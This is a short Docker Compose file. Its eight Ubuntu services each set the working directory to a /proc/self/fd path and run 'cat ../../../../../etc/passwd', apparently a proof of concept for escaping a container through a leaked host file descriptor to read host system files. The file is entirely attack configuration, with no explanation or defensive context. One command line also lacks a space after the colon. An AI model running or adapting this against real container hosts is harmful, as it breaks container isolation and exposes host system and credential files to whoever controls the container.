version: '3.8'

services:
  container1:
    image: ubuntu:22.04
    command: cat ../../../../../etc/passwd 
    workdir: /proc/self/fd/3
  
  container2:
    image: ubuntu:22.04
    command:cat ../../../../../etc/passwd 
    workdir: /proc/self/fd/4
  
  container3:
    image: ubuntu:22.04
    command: cat ../../../../../etc/passwd 
    workdir: /proc/self/fd/5
  
  container4:
    image: ubuntu:22.04
    command: cat ../../../../../etc/passwd 
    workdir: /proc/self/fd/6
  
  container5:
    image: ubuntu:22.04
    command: cat ../../../../../etc/passwd 
    workdir: /proc/self/fd/7

  container6:
    image: ubuntu:22.04
    command: cat ../../../../../etc/passwd 
    workdir: /proc/self/fd/8
    
  container7:
    image: ubuntu:22.04
    command: cat ../../../../../etc/passwd 
    workdir: /proc/self/fd/9

  container8:
    image: ubuntu:22.04
    command: cat ../../../../../etc/passwd 
    workdir: /proc/self/fd/10
